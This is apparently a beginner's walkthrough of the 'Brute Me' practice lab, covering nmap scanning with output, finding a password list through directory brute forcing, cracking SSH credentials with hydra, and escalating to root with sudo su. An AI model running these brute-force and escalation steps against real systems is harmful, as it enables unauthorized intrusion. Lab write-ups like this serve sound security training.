Brute Me Lab Walkthrough
This is a detailed walkthrough of the Brute Me lab from Imran at NixSecura. I'll show how I moved from initial scanning to full root access, including enumeration, brute forcing, and privilege escalation.
Step 1: Reconnaissance with Nmap
First thing I did was run a full scan to see what services are up:
nmap -sV -A 192.168.1.22
Host is up (0.0046s latency).
Not shown: 65531 filtered tcp ports (no‑response)
PORT STATE SERVICE VERSION
20/tcp closed ftp‑data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: e1Pr0f3ss0r's l3g4cy
MAC Address: 24:B2:B9:47:0E:F5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see:
- FTP running on port 21
- SSH on port 22
- HTTP on port 80
Step 2: Web Enumeration
Visiting http://192.168.1.22 gave me a page titled “e1Pr0f3ss0r's l3g4cy”. Using directory brute forcing (with tools like gobuster), I discovered a file called /creds.disc.
tokyo
berlin
nairobi
rockyou
papel
la-casa
money-heist
nobita
ninja7
ikn0wy0u
don'tbruteme
legacy
crackit
badboy123
anonymous
admin
user123
mr.r0b0t
darlen
travel3r
academy.icorx
b31l@c1a0
caroline
g01df1$h
purple
b3stfr1ends
h3l10fr113nd
D3nv3r
proxy99
This list of credentials looked promising for brute‑forcing FTP/SSH.
Step 3: Brute Forcing SSH & FTP with Hydra
I used hydra to try all combinations. The command was something like:
hydra -L users.txt -P passwords.txt ssh://192.168.1.22
After some attempts, I found valid login:
login: ninja7
password: caroline
The same credentials also worked for FTP.
Step 4: Logging in via SSH
Using:
ssh ninja7@192.168.1.22
Once inside as ninja7, I explored the home directory, collected flags & clues.
Step 5: Privilege Escalation to Root
Next I checked sudo permissions:
sudo ‑l
Turns out ninja7 had privilege to run sudo su. Then I used the same password (caroline) to escalate:
sudo su
Then I confirmed root:
whoami
# output: root
Final Thoughts
This lab reinforced some essential lessons:
- Weak or bruteforceable credentials can lead to full compromise.
- Enumerate web‑facing services for hidden files or directories.
- Privilege escalation often hides in sudo permissions.
Huge thanks to Imran and NixSecura Services for creating a lab that’s beginner friendly yet educational.